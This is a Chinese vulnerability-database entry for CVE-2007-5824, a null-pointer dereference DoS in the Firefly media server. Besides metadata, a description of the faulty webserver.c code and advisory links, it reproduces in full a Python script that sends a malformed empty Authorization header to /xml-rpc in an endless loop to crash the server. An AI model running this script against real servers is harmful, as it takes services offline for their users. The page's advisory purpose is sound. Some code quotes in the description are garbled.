Firefly媒体服务器空指针引用漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113888 漏洞类型 输入验证
发布时间 2007-11-02 更新时间 2008-09-02
CVE编号 CVE-2007-5824 CNNVD-ID CNNVD-200711-050
漏洞平台 Linux CVSS评分 7.1
|漏洞来源
https://www.exploit-db.com/exploits/4600
https://www.securityfocus.com/bid/26309
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-050
|漏洞详情
Firefly是RokuSoundBridge和iTunes所使用的开源媒体服务器。Firefly在处理畸形文件时存在漏洞,远程攻击者可能利用此漏洞导致服务器崩溃。在Firefly的webserver.c文件中,ws_getheaders函数的631行存在空指针引用漏洞。如果文件头中的某行(非第一行)不包含"':"的话,就会触发这个漏洞,因为strsep(&last,':')会对变量last分配NULL,然后代码试图引用last:strsep(&last,":");if(last==first){DPRINTF(E_WARN,L_WS,"Thread%d:Invalidheader:%s\n",pwsc->threadno,first);}else{while(*last=='')last++;webserver.c文件的ws_decodepassword函数的1399行也存在空指针引用漏洞。header变量会一直递增,直到遇到空字符,因此可能会越界引用内存:/*xlattableisinitialized*/while(*header!='')header++;"
|漏洞EXP
#!C:\python25\python25.exe

"""
Advisory : [UPH-07-02]
mt-dappd/Firefly media server remote DoS
Discovered by nnp
http://www.unprotectedhex.com
"""

import sys
import socket
import time

if len(sys.argv) != 3:
    sys.exit(-1)

kill_msg = """GET /xml-rpc?method=stats HTTP/1.1\r\n 
Authorization:\r\n\r\n"""

host = sys.argv[1]
port = sys.argv[2]

print '[+] Host : ' + host
print '[+] Port : ' + port

print "[+] Sending "
print kill_msg

ctr = 1
while 1:
    print '[+] Ctr : ' + str(ctr)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, int(port)))
    s.send(kill_msg)
    s.close()
    ctr += 1

# milw0rm.com [2007-11-02]
|受影响的产品
Gentoo Linux Firefly Media Server 0.2.4 Debian Linux 4.0 sparc Debian Linux 4.0 s/390 Debian Linux 4.0 powerpc Debian Linux 4.0 mipsel Debian Linux 4.0
|参考资料

来源:BUGTRAQ
名称:20071102Re:[UPH-07-01]FireflyMediaServerDoS
链接:http://www.securityfocus.com/archive/1/archive/1/483215/100/0/threaded
来源:BUGTRAQ
名称:20071102[UPH-07-02]FireflyMediaServerDoS
链接:http://www.securityfocus.com/archive/1/archive/1/483211/100/0/threaded
来源:BUGTRAQ
名称:20071102[UPH-07-01]FireflyMediaServerDoS
链接:http://www.securityfocus.com/archive/1/archive/1/483210/100/0/threaded
来源:MILW0RM
名称:4600
链接:http://www.milw0rm.com/exploits/4600
来源:DEBIAN
名称:DSA-1597
链接:http://www.debian.org/security/2008/dsa-1597
来源:SECUNIA
名称:30661
链接:http://secunia.com/advisories/30661
来源:XF
名称:firefly-decodepassword-dos(38242)
链接:http://xforce.iss.net/xforce/xfdb/38242
来源:XF
名称:firefly-getheaders-dos(38241)
链接:http://xforce.iss.net/xforce/xfdb/38241
来源:BID
名称:26309
链接:http://www.securityfocus.com/bid/26309
来源:GENTOO
名称:GLSA-200712-18
链接:http://www.gentoo.org/security/en/glsa/glsa-200712-18.xml
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?group_id=98211&release_id=548679
来源:SEC